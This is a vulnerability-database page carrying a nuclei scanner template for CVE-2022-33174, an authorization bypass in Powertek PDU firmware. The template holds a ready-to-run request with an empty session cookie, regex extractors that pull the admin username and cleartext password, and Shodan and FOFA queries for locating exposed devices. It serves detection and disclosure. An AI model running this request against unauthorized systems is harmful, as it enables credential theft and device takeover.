Lucene search
K

Powertek Firmware <3.30.30 - Authorization Bypass

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

Powertek Firmware 3.30.30 Authorization Bypass Security Vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-33174
13 Jun 202218:15
attackerkb
Circl
CVE-2022-33174
2 Sep 202207:31
circl
CNNVD
Powertek PDU 安全漏洞
13 Jun 202200:00
cnnvd
CNVD
Powertek PDU Certification Bypass Vulnerability
13 Jun 202200:00
cnvd
CVE
CVE-2022-33174
13 Jun 202217:04
cve
Cvelist
CVE-2022-33174
13 Jun 202217:04
cvelist
NVD
CVE-2022-33174
13 Jun 202218:15
nvd
OSV
CVE-2022-33174
13 Jun 202218:15
osv
Prion
Authorization
13 Jun 202218:15
prion
Positive Technologies
PT-2022-21723 · Powertek +1 · Powertek +1
13 Jun 202200:00
ptsecurity
Rows per page
id: CVE-2022-33174

info:
  name: Powertek Firmware <3.30.30 - Authorization Bypass
  author: pikpikcu
  severity: high
  description: |
    Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system.
  remediation: |
    Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability.
  reference:
    - https://gynvael.coldwind.pl/?lang=en&id=748
    - https://nvd.nist.gov/vuln/detail/CVE-2022-33174
    - https://github.com/Henry4E36/CVE-2022-33174
    - https://github.com/k0mi-tg/CVE-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-33174
    cwe-id: CWE-863
    epss-score: 0.13425
    epss-percentile: 0.95957
    cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: powertekpdus
    product: basic_pdu_firmware
    shodan-query:
      - http.html:"Powertek"
      - http.html:"powertek"
    fofa-query: body="powertek"
  tags: cve2022,cve,powertek,auth-bypass,powertekpdus,vuln

http:
  - raw:
      - |
        GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1
        Host: {{Hostname}}
        Cookie: tmpToken=;

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<sys.passwd>'
          - '<sys.su.name>'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '<sys\.passwd>([A-Z0-9a-z]+)<\/sys\.passwd>'
          - '<sys\.su\.name>([a-z]+)<\/sys\.su\.name>'
        part: body
# digest: 4a0a00473045022100d8dfa2122445312011491eea76d60ed4232ba0e4fda0c592800be9eb7cfeee200220444b5c56f12425db2845bc5539892fd95f961a9cd99535163a050487c9e45f7c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation